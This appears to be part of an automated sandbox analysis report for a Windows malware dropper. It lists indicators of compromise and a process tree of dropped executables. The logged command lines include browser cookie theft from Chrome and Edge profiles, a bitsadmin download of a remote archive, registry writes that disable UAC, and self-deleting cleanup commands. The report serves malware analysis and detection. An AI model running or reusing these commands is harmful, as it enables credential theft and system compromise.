5640 explorer.exe 5640 explorer.exe 5640 explorer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2248 sonia_4.exe Token: SeRestorePrivilege 3180 WerFault.exe Token: SeBackupPrivilege 3180 WerFault.exe Token: SeDebugPrivilege 3180 WerFault.exe Token: SeDebugPrivilege 2416 rundll32.exe Token: SeDebugPrivilege 740 svchost.exe Token: SeDebugPrivilege 2416 rundll32.exe Token: SeDebugPrivilege 2416 rundll32.exe Token: SeDebugPrivilege 2416 rundll32.exe Token: SeDebugPrivilege 2416 rundll32.exe Token: SeDebugPrivilege 2416 rundll32.exe Token: SeDebugPrivilege 2416 rundll32.exe Token: SeDebugPrivilege 2416 rundll32.exe Token: SeDebugPrivilege 2416 rundll32.exe Token: SeDebugPrivilege 2416 rundll32.exe Token: SeDebugPrivilege 2416 rundll32.exe Token: SeDebugPrivilege 2416 rundll32.exe Token: SeDebugPrivilege 2416 rundll32.exe Token: SeDebugPrivilege 4620 WerFault.exe Token: SeShutdownPrivilege 2180 Process not Found Token: SeCreatePagefilePrivilege 2180 Process not Found Token: SeShutdownPrivilege 2180 Process not Found Token: SeCreatePagefilePrivilege 2180 Process not Found Token: SeDebugPrivilege 740 svchost.exe Token: SeShutdownPrivilege 2180 Process not Found Token: SeCreatePagefilePrivilege 2180 Process not Found Token: SeShutdownPrivilege 2180 Process not Found Token: SeCreatePagefilePrivilege 2180 Process not Found Token: SeShutdownPrivilege 2180 Process not Found Token: SeCreatePagefilePrivilege 2180 Process not Found Token: SeShutdownPrivilege 2180 Process not Found Token: SeCreatePagefilePrivilege 2180 Process not Found Token: SeShutdownPrivilege 2180 Process not Found Token: SeCreatePagefilePrivilege 2180 Process not Found Token: SeShutdownPrivilege 2180 Process not Found Token: SeCreatePagefilePrivilege 2180 Process not Found Token: SeCreateTokenPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeAssignPrimaryTokenPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeLockMemoryPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeIncreaseQuotaPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeMachineAccountPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeTcbPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeSecurityPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeTakeOwnershipPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeLoadDriverPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeSystemProfilePrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeSystemtimePrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeProfSingleProcessPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeIncBasePriorityPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeCreatePagefilePrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeCreatePermanentPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeBackupPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeRestorePrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeShutdownPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeDebugPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeAuditPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeSystemEnvironmentPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeChangeNotifyPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeRemoteShutdownPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeUndockPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeSyncAgentPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeEnableDelegationPrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeManageVolumePrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe Token: SeImpersonatePrivilege 4048 KElpfrzwUGLUdc_9rwohEOlO.exe -
Suspicious use of FindShellTrayWindow 13 IoCs
pid Process 1484 AIk1de2B5c8JTfTJCb9GhHAo.tmp 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 4164 ultramediaburner.tmp 5100 installer.exe 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found 2180 Process not Found -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 5164 BB8D.exe 2180 Process not Found 5680 MicrosoftEdge.exe 6916 MicrosoftEdgeCP.exe 6916 MicrosoftEdgeCP.exe 6340 MicrosoftEdge.exe 4924 MicrosoftEdgeCP.exe 4924 MicrosoftEdgeCP.exe 5020 22A5.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 2180 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 996 wrote to memory of 2520 996 8 (12).exe 75 PID 996 wrote to memory of 2520 996 8 (12).exe 75 PID 996 wrote to memory of 2520 996 8 (12).exe 75 PID 2520 wrote to memory of 1492 2520 setup_installer.exe 76 PID 2520 wrote to memory of 1492 2520 setup_installer.exe 76 PID 2520 wrote to memory of 1492 2520 setup_installer.exe 76 PID 1492 wrote to memory of 3420 1492 setup_install.exe 79 PID 1492 wrote to memory of 3420 1492 setup_install.exe 79 PID 1492 wrote to memory of 3420 1492 setup_install.exe 79 PID 1492 wrote to memory of 4056 1492 setup_install.exe 80 PID 1492 wrote to memory of 4056 1492 setup_install.exe 80 PID 1492 wrote to memory of 4056 1492 setup_install.exe 80 PID 1492 wrote to memory of 2976 1492 setup_install.exe 93 PID 1492 wrote to memory of 2976 1492 setup_install.exe 93 PID 1492 wrote to memory of 2976 1492 setup_install.exe 93 PID 1492 wrote to memory of 2296 1492 setup_install.exe 84 PID 1492 wrote to memory of 2296 1492 setup_install.exe 84 PID 1492 wrote to memory of 2296 1492 setup_install.exe 84 PID 1492 wrote to memory of 2140 1492 setup_install.exe 81 PID 1492 wrote to memory of 2140 1492 setup_install.exe 81 PID 1492 wrote to memory of 2140 1492 setup_install.exe 81 PID 1492 wrote to memory of 1008 1492 setup_install.exe 82 PID 1492 wrote to memory of 1008 1492 setup_install.exe 82 PID 1492 wrote to memory of 1008 1492 setup_install.exe 82 PID 1492 wrote to memory of 2292 1492 setup_install.exe 83 PID 1492 wrote to memory of 2292 1492 setup_install.exe 83 PID 1492 wrote to memory of 2292 1492 setup_install.exe 83 PID 1008 wrote to memory of 1608 1008 cmd.exe 85 PID 1008 wrote to memory of 1608 1008 cmd.exe 85 PID 1008 wrote to memory of 1608 1008 cmd.exe 85 PID 2976 wrote to memory of 3920 2976 cmd.exe 92 PID 2976 wrote to memory of 3920 2976 cmd.exe 92 PID 2976 wrote to memory of 3920 2976 cmd.exe 92 PID 3420 wrote to memory of 3924 3420 cmd.exe 86 PID 3420 wrote to memory of 3924 3420 cmd.exe 86 PID 3420 wrote to memory of 3924 3420 cmd.exe 86 PID 4056 wrote to memory of 3952 4056 cmd.exe 87 PID 4056 wrote to memory of 3952 4056 cmd.exe 87 PID 4056 wrote to memory of 3952 4056 cmd.exe 87 PID 2296 wrote to memory of 2248 2296 cmd.exe 91 PID 2296 wrote to memory of 2248 2296 cmd.exe 91 PID 2140 wrote to memory of 1652 2140 cmd.exe 90 PID 2140 wrote to memory of 1652 2140 cmd.exe 90 PID 2140 wrote to memory of 1652 2140 cmd.exe 90 PID 3924 wrote to memory of 3248 3924 sonia_1.exe 94 PID 3924 wrote to memory of 3248 3924 sonia_1.exe 94 PID 3924 wrote to memory of 3248 3924 sonia_1.exe 94 PID 1608 wrote to memory of 2504 1608 sonia_6.exe 96 PID 1608 wrote to memory of 2504 1608 sonia_6.exe 96 PID 1608 wrote to memory of 2504 1608 sonia_6.exe 96 PID 3780 wrote to memory of 2416 3780 rUNdlL32.eXe 98 PID 3780 wrote to memory of 2416 3780 rUNdlL32.eXe 98 PID 3780 wrote to memory of 2416 3780 rUNdlL32.eXe 98 PID 2416 wrote to memory of 740 2416 rundll32.exe 71 PID 740 wrote to memory of 2384 740 svchost.exe 99 PID 740 wrote to memory of 2384 740 svchost.exe 99 PID 2416 wrote to memory of 2892 2416 rundll32.exe 24 PID 740 wrote to memory of 2384 740 svchost.exe 99 PID 2416 wrote to memory of 340 2416 rundll32.exe 62 PID 2416 wrote to memory of 2484 2416 rundll32.exe 29 PID 2416 wrote to memory of 2460 2416 rundll32.exe 30 PID 2416 wrote to memory of 1056 2416 rundll32.exe 57 PID 2416 wrote to memory of 912 2416 rundll32.exe 59 PID 2416 wrote to memory of 1408 2416 rundll32.exe 50 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" 22A5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 22A5.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" 22A5.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2684
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵PID:2892
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2676
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2484
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2460
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\8 (12).exe"C:\Users\Admin\AppData\Local\Temp\8 (12).exe"1⤵
- Suspicious use of WriteProcessMemory
PID:996 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_1.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3420 -
C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_1.exesonia_1.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3924 -
C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_1.exe"C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_1.exe" -a6⤵
- Executes dropped EXE
PID:3248
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_2.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_2.exesonia_2.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3952
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_5.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_5.exesonia_5.exe5⤵
- Executes dropped EXE
- Checks computer location settings
PID:1652 -
C:\Users\Admin\Documents\73N2f3dsqZtT_GryIgwJzBYi.exe"C:\Users\Admin\Documents\73N2f3dsqZtT_GryIgwJzBYi.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4252 -
C:\Users\Admin\Documents\73N2f3dsqZtT_GryIgwJzBYi.exe"C:\Users\Admin\Documents\73N2f3dsqZtT_GryIgwJzBYi.exe"7⤵PID:4956
-
-
-
C:\Users\Admin\Documents\KElpfrzwUGLUdc_9rwohEOlO.exe"C:\Users\Admin\Documents\KElpfrzwUGLUdc_9rwohEOlO.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4048 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:4304
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:4180
-
-
-
-
C:\Users\Admin\Documents\F5KxfcnjllEXYHxs018b2Rwy.exe"C:\Users\Admin\Documents\F5KxfcnjllEXYHxs018b2Rwy.exe"6⤵
- Executes dropped EXE
PID:2920
-
-
C:\Users\Admin\Documents\zZCNMCvyd604ZSbu0Gww4ZQp.exe"C:\Users\Admin\Documents\zZCNMCvyd604ZSbu0Gww4ZQp.exe"6⤵
- Executes dropped EXE
PID:4400 -
C:\Users\Admin\Documents\zZCNMCvyd604ZSbu0Gww4ZQp.exe"{path}"7⤵PID:4340
-
-
C:\Users\Admin\Documents\zZCNMCvyd604ZSbu0Gww4ZQp.exe"{path}"7⤵PID:4048
-
-
-
C:\Users\Admin\Documents\dhu7EuXl9V9UCb1xTP4C8z2_.exe"C:\Users\Admin\Documents\dhu7EuXl9V9UCb1xTP4C8z2_.exe"6⤵
- Executes dropped EXE
- Modifies registry class
PID:1228 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
- Executes dropped EXE
PID:584
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
- Executes dropped EXE
PID:5248
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:5932
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:6124
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:5040
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:6868
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:6276
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:6348
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:5228
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:5180
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:2856
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:4512
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:6968
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:5992
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:5460
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:5512
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:5984
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:6964
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:3716
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:772
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:6536
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:2124
-
-
-
C:\Users\Admin\Documents\uXr09RWmY6SRMbrDSFfaZ_0f.exe"C:\Users\Admin\Documents\uXr09RWmY6SRMbrDSFfaZ_0f.exe"6⤵
- Executes dropped EXE
PID:392 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 392 -s 4807⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4232
-
-
-
C:\Users\Admin\Documents\hsCdANIUKB4wzcSDG7GdlU2e.exe"C:\Users\Admin\Documents\hsCdANIUKB4wzcSDG7GdlU2e.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2400
-
-
C:\Users\Admin\Documents\m_fBIbDOJjJ40H7N08r37W_j.exe"C:\Users\Admin\Documents\m_fBIbDOJjJ40H7N08r37W_j.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3244 -
C:\Users\Admin\Documents\m_fBIbDOJjJ40H7N08r37W_j.exeC:\Users\Admin\Documents\m_fBIbDOJjJ40H7N08r37W_j.exe7⤵
- Executes dropped EXE
PID:4860
-
-
-
C:\Users\Admin\Documents\eeKqGdOincy_ixPYMRHkQJWN.exe"C:\Users\Admin\Documents\eeKqGdOincy_ixPYMRHkQJWN.exe"6⤵
- Executes dropped EXE
PID:4536
-
-
C:\Users\Admin\Documents\lJP2dxEPmNCJIDNdHyFHwpJu.exe"C:\Users\Admin\Documents\lJP2dxEPmNCJIDNdHyFHwpJu.exe"6⤵
- Executes dropped EXE
PID:4972
-
-
C:\Users\Admin\Documents\C2dq7a8ZKe65UPgzVtenVMuG.exe"C:\Users\Admin\Documents\C2dq7a8ZKe65UPgzVtenVMuG.exe"6⤵
- Executes dropped EXE
PID:4864 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 6567⤵
- Program crash
PID:908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 6687⤵
- Program crash
PID:4916
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 6727⤵
- Program crash
PID:4240
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 6887⤵
- Program crash
PID:4960
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 11207⤵
- Program crash
PID:4100
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 11487⤵
- Program crash
PID:4292
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 11607⤵
- Program crash
PID:2608
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "C2dq7a8ZKe65UPgzVtenVMuG.exe" /f & erase "C:\Users\Admin\Documents\C2dq7a8ZKe65UPgzVtenVMuG.exe" & exit7⤵PID:4652
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "C2dq7a8ZKe65UPgzVtenVMuG.exe" /f8⤵
- Kills process with taskkill
PID:4916
-
-
-
-
C:\Users\Admin\Documents\i5bS_Ih72f4r9YsRDRsMHIek.exe"C:\Users\Admin\Documents\i5bS_Ih72f4r9YsRDRsMHIek.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5088 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im i5bS_Ih72f4r9YsRDRsMHIek.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\i5bS_Ih72f4r9YsRDRsMHIek.exe" & del C:\ProgramData\*.dll & exit7⤵PID:6084
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im i5bS_Ih72f4r9YsRDRsMHIek.exe /f8⤵
- Kills process with taskkill
PID:5244
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
PID:4960
-
-
-
-
C:\Users\Admin\Documents\uHm09NMJM6F4Q046FphKs_dN.exe"C:\Users\Admin\Documents\uHm09NMJM6F4Q046FphKs_dN.exe"6⤵
- Executes dropped EXE
PID:1648 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 6647⤵
- Program crash
PID:4492
-
-
-
C:\Users\Admin\Documents\hJnmKJvqSgAJfTJT6M9Cw6Ri.exe"C:\Users\Admin\Documents\hJnmKJvqSgAJfTJT6M9Cw6Ri.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:5032 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4956
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵PID:2700
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵PID:5592
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵PID:5892
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵PID:3628
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵PID:3100
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵
- Checks for any installed AV software in registry
PID:3968
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z7⤵
- Download via BitsAdmin
PID:6136
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQLV9quaGdLErsKh -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵
- Drops file in Program Files directory
PID:772
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfsY50a76TFlsHmZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"7⤵PID:6296
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵PID:4416
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵PID:4152
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵PID:1968
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵PID:6504
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵PID:6744
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs7⤵PID:5396
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs8⤵
- Drops file in System32 directory
PID:4340
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵PID:5920
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵PID:4896
-
-
